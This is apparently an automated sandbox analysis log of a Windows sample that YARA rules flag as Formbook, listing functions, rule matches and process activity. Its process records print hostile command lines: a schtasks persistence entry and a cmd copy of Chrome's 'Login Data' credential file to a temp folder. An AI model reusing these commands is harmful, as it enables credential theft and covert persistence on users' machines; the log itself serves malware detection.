          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759E70 NtClose
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759F20 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759D3A NtCreateFile
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759DEA NtCreateFile, NtReadFile
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759E6B NtClose
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00759F1A NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02793248
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279FA10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02795608
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02794EE0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02795F00
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279BFD8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_027943D0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02790A70
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279C268
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02794E40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279323A
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798E10
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02797A08
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798A08
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02795EF0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279DEE8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02799AC8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02799AB3
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02794EB5
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_027942AB
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02794367
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798BB8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798BAA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798F90
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279EB88
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798F80
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798478
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02798469
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_02797860
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_0279D918
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_027979F9
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_027955F8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_027989F8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0348
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0610
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0070
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0338
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0600
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 0_2_05EF0017
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00401030
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041D158
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041DA41
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041D321
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041DC0B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041DD04
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00402D88
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00402D90
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041D5BC
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00409E40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00409E3C
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_0041D786
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_00402FB0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AA99BF
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AA4120
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01A8F900
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AB20A0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B520A8
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01A9B090
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B528EC
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B5E824
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AAA830
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B41002
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01ABEBB0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B4DBD2
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B403DA
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B52B28
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AAAB40
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B522AE
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B3FA2B
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AB2581
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01A9D5E0
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B525DD
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01A80D20
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B52D07
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B51D55
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01A9841F
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B4D466
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B51FF1
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B5DFCE
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B52EF7
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01AA6E30
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: 3_2_01B4D616
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A320A0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD20A8
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A1B090
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AC1002
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A1841F
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A32581
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A1D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A00D20
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A24120
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A0F900
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD2D07
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD1D55
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD22AE
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD2EF7
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A26E30
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04A3EBB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD1FF1
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04ACDBD2
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_04AD2B28
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00742D90
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00742D88
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00749E40
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00749E3C
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: 10_2_00742FB0
          Source: C:\Windows\SysWOW64\cmmon32.exe | Code function: String function: 04A0B150 appears 35 times
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Code function: String function: 01A8B150 appears 72 times
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229521186.0000000005D40000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229521186.0000000005D40000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameB2B.exe4 vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.224274435.00000000027C0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameHutaba.dll, vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.229280780.0000000005C40000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000000.00000002.228765539.0000000004E30000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000000.223005615.000000000103C000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263115124.0000000001B7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263565376.0000000001EB9000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCMMON32.exe` vs xxgTjC4efAMDXvr.exe
          Source: xxgTjC4efAMDXvr.exe | Binary or memory string: OriginalFilenamepF vs xxgTjC4efAMDXvr.exe
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260048280.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260492658.0000000001510000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.226254725.0000000003DC9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.476303103.0000000000BA0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.476424827.0000000000BE0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.260413976.00000000014E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.475886802.0000000000740000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.226169941.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.xxgTjC4efAMDXvr.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@10/8@4/4
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File created: C:\Users\user\AppData\Roaming\EURYWhTdx.exe
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6660:120:WilError_01
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5788:120:WilError_01
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File created: C:\Users\user\AppData\Local\Temp\tmp3977.tmp
          Source: xxgTjC4efAMDXvr.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
          Source: xxgTjC4efAMDXvr.exe | ReversingLabs: Detection: 22%
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File read: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe
          Source: unknown | Process created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe 'C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe'
          Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown | Process created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe {path}
          Source: unknown | Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\EURYWhTdx' /XML 'C:\Users\user\AppData\Local\Temp\tmp3977.tmp'
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Process created: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe {path}
          Source: C:\Windows\SysWOW64\cmmon32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Windows\SysWOW64\cmmon32.exe | File written: C:\Users\user\AppData\Roaming\L6725004\L67logri.ini
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
          Source: C:\Windows\SysWOW64\cmmon32.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: xxgTjC4efAMDXvr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: C:\Users\user\Desktop\xxgTjC4efAMDXvr.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
          Source: xxgTjC4efAMDXvr.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cmmon32.pdb source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263552372.0000000001EB0000.00000040.00000001.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263552372.0000000001EB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: xxgTjC4efAMDXvr.exe, 00000003.00000002.263115124.0000000001B7F000.00000040.00000001.sdmp, cmmon32.exe, 0000000A.00000003.260186371.00000000046B0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: xxgTjC4efAMDXvr.exe, cmmon32.exe
          Source: Binary string: mscorrc.pdb source: xxgTjC4efAMDXvr.exe, 00000000.00000002.228765539.0000000004E30000.00000002.00000001.sdmp

          Data Obfuscation:
